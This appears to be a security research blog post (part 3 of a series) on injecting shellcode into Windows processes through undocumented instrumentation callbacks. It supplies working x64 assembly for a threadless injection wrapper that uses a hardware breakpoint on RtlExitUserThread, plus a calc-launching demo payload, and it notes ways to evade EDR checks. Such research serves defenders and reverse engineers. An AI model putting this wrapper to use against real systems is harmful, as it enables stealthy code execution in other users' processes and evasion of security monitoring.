Reverse Engineering, Windows

Windows Instrumentation Callbacks – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this by the example of intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Due to the IC getting executed as a callback to every returning syscall, setting an IC on another process would mean getting code execution in that processes’ context, which can be used for a process injection.

Process injection

If you understood the blog series so far, it is very likely that you know what a process injection is. Let’s break down what is normally needed for a regular process injection, that is injecting code into another process. Depending on whether you’re familiar with the concept of virtual address spaces and virtual memory in general, trying to access memory in another process would result in expected or unexpected results. The code normally needs to get written to the other process. Obviously, to write the code to the other process’ memory space, you need to have a handle to the process with sufficient permissions and need to know where to write the code. For this you normally have two options: allocating memory in the other process context or overwriting an existing executable memory region. After the code was written to an executable memory region, it needs to get executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injections or thread hijacking. There are many ways, but they all effectively just execute the written code. There are multiple websites online that collect different execution mechanisms; however, most don’t include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case for them, but it can also be used for exactly what it should detect. That would also have the bonus effect of overwriting their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

I also found a blog post by splinter_code who seems to have already written a blog post about using ICs for process injections in 2020. Don’t worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be heavily depends on your payload. Assume you, for example, only want to make one WinExec call and your payload in total got like ten assembly operations, this won’t add a massive overhead to your program. You could just directly call the payload in the IC (assuming you added a way to disable syscall recursion in the IC), but once you use a payload that yields, for example a C2 agent, the program will stop working/run into issues because a required thread was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without causing the thread that called the IC to yield for long? By instead spawning a process. Just kidding, let’s reuse the hooking method we used in the previous blog post and instead hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a cautious reader of the OpenProcess MSDN page might’ve read the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out that the SeDebugPrivilege is required to set an IC on another process in the first blog post. Herein lays the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means, the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that for you to test your injector you need that privilege, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and payload wrapper need to be position-independent, as they shouldn’t be executed in our process’s context but instead the victim’s. This also means that we need both the starting address and the size of the assembly code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps to first assemble the assembly and then write them to a C++ header file that simply contains a C++ array with the assembled bytes in it.

In other words: the CMakeLists.txt file contains multiple add_custom_commands, which first executes the assembler (we’re using nasm), then uses objcopy to copy out the .text section of the object file into a temporary binary file and then executes a Python script to read in the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake targets’ sources. In this case, we only did this for the payload wrapper.

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

mov ecx,0x636c6163 ; calc
push rcx
mov rcx, rsp
mov r14,0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30
ret

Payload wrapper

So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, so in our example have multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once every thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
  if (!payload_executed && !thread_set_hardware_bp) {
    thread_set_hardware_bp = true
    if (!set_hwbp(RtlExitUserThread)) // Does syscall
      thread_set_hardware_bp = false   
    return
  }
  if (!is_exception(ic_origin))
    return
  if (exception_origin() != RtlExitUserThread)
    return
  remove_hwbp(RtlExitUserThread) // Does syscall
  if (!payload_executed) {
    payload_executed = true 
    execute_payload() // (Most likely) does syscall
  }
  restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.

This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.

A process-local flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. RWX allocations should be avoided due to them being highly suspicious. This causes another issue: the flag address can’t be known at runtime due to being dynamically allocated. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, due to the memory region being not writable, so we couldn’t store it.

Our solution for this is to use a placeholder address for the flag such as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

The following code basically does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
  CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
  GetThreadContext(GetCurrentThread(), &context);
  context.Dr3 = bp_address;
  context.Dr7 |= 1ULL << 6;
  SetThreadContext(GetCurrentThread(), &context);
}

Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
    ; Save used registers
    push r14
    push r13
    push rdi
    push rbx
    mov r13, rcx
    mov rbx, rdx
    sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
    mov rdi, rsp ; CONTEXT base
    mov r14, rdi ; rep stosq changes rdi, this is backup
    ; Zero CONTEXT struct
    mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
    xor rax, rax
    rep stosq
    ; CONTEXT_DEBUG_REGISTERS
    mov dword [r14 + 0x30], 0x00100010
    ; GetCurrentThread() == -2
    xor rcx, rcx
    dec rcx
    dec rcx
    ; The saved CONTEXT base
    mov rdx, r14
    ; Shadow space
    sub rsp, 0x20
    ; GetThreadContext placeholder
    mov rdi, 0x6CCCCCCCCCCCCCCC
    call rdi
    add rsp, 0x20 ; Shadow space
    ; if return value == 0 it errored
    test rax, rax
    jz _set_dr_ret
    ; Set Dr3
    mov qword [r14 + 0x60], r13
    ; offsetof(CONTEXT, Dr7) = 0x70
    mov rcx, [r14 + 0x70]
    ; Clear Dr3 specific bits
    and rcx, ~((3 << 16) | (3 << 18) | (1 << 6)) 
    test rbx, rbx
    jz _skip_enable_bp
   ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)   
   or rcx, (1 << 6) 
  _skip_enable_bp:
    ; Dr7 = new Dr7
    mov [r14+0x70], rcx
    ; SetThreadContext
    xor rcx, rcx
    dec rcx
    dec rcx
    mov rdx, r14
    ; Shadow space
    sub rsp, 0x20
    ; GetThreadContext placeholder
    mov rdi, 0x5CCCCCCCCCCCCCCC
    call rdi
    add rsp, 0x20 ; Shadow space
  _set_dr_ret:
    add rsp, 0x4d8 ; + 8 alignment
    pop rbx
    pop rdi
    pop r13
    pop r14
    ret

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime. For the thread-local one, we will again use the Thread Environment Block. There are more unsuspicious ways of doing this.

load_bp_set_ptr_into_rcx:
  ; TEB 
  mov rcx, gs:[30h]
  ; TEB->InstrumentationCallbackDisabled 
  add rcx, 1b8h
  ret
load_bitflag_into_rcx:
  ; rcx = pointer bit flag (placeholder currently)
  mov rcx, 0x2CCCCCCCCCCCCCCC
  ret

Execution logic

Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also got access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. Callbacks aren’t always guaranteed to be aligned (RSP % 0x10 != 0, sometimes RSP % 0x10 = 8). To avoid issues, we are manually aligning the stack so all Windows API calls and also the payload call is 16 bytes aligned. So that the stack can be properly restored, we aren’t simply overwriting RSP but instead push a placeholder to check when returning if the stack was adjusted.

entry:
  ; The actual return address of the IC
  push r10
  push r14
  mov r14, rsp
  add r14, 0x10
  push rax
  push rcx
  push rdx
  ; Rsp should be aligned for both cases, so it’s done here
  mov rdx, rsp
  and dl, 0xF
  cmp dl, 0x8
  jne _skip_align
  mov rdx, 0xDEADBEEF
  push rdx
_skip_align:
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  cmp [rcx], rax
  je _hwbp_is_set
  ; “is_exception” check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
  ; Unalign rsp if it was previously modified
  cmp dword [rsp], 0xDEADBEEF
  jne _ret
  add rsp, 8
_ret:
  pop rdx
  pop rcx
  xor rcx, rcx
  pop rax
  pop r14
  ; r10 still on top of stack à return to it
  ret

First execution

To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread (_first_execution_in_thread). Let’s look at the relevant excerpt from the pseudo code:

[…]
  if (!payload_executed && !thread_set_hardware_bp) {
    thread_set_hardware_bp = true
    if (!set_hwbp(RtlExitUserThread)) // Does syscall
      thread_set_hardware_bp = false   
    return
  }
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
  call load_bitflag_into_rcx
  xor rax, rax
  inc rax
  ; Was payload already executed? If yes, don’t set BP
  cmp [rcx], rax
  je _ret_unalign
  ; Set BP set flag to avoid recursion
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  inc rax
  ; bp set flag = 1
  mov [rcx], rax
  ; RtlExitUserThread placeholder
  mov rcx, 0x3CCCCCCCCCCCCCCC
  xor rdx, rdx
  inc rdx ; Enable hwbp
  call set_dr
  ; Failed (rax != 0)?
  test rax, rax
  jnz _ret_unalign
  ;  bp set flag = 0 to retry on the next IC trigger
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  mov [rcx], rax
  ; Fall through on purpose to return
_ret_unalign
  ; […]

After HWBP was set

Let’s look back at the pseudo code for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
  […]
  if (!is_exception(ic_origin))
    return
  if (exception_origin != RtlExitUserThread)
    return
  remove_hwbp(RtlExitUserThread) // Does syscall
  if (!payload_executed) {
    payload_executed = true 
    execute_payload() // (Most likely) does syscall
  }
  restore_context()
}

We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserThreadExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserThreadExceptionDispatcher placeholder
    mov rcx, 0x4CCCCCCCCCCCCCCC
    cmp r10, rcx
    jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
    test r14, r14
    jz _ret_unalign
    ; Exception thrown, but is it ours?
    ; RtlExitUserThread placeholder
    mov r10, 0x3CCCCCCCCCCCCCCC
    mov rcx, [r14+0xf8]
    cmp r10, rcx
    ; Not our exception
    jne _ret_unalign
    ; Unset bp
    xor rcx, rcx
    xor rdx, rdx
    call set_dr
    call load_bitflag_into_rcx
    ; Save context base
    push r14
    ; payload was already executed
    cmp qword [rcx], 1
    je _restore_context
    ; Set payload executed flag
    mov qword [rcx], 1
    sub rsp, 0x20
    call payload
    add rsp, 0x20
    ; as you can see, the payload needs to not mangle the stack
    ; otherwise it should call RtlExitUserThread itself
    ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
    ; Restore context base to rcx     
    pop rcx
    ; Set ResumeFlag in EFlags register
    or dword [rcx+0x44], 0x10000
    ; ExceptionRecord = nullptr
    xor rdx, rdx
    ; Call RtlRestoreContext
    sub rsp, 0x20
    mov rdi, 0x8CCCCCCCCCCCCCCC
    call rdi
    ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Talking about that, the blog post is already pretty long so we’ve decided to not add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC till 0x8CCCCCCCCCCCCCCC. The placeholders are commented with what function they require. The flag placeholder simply requires a 1-byte allocation with read and write permissions in the target process.

After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.

Further blog articles

Reverse Engineering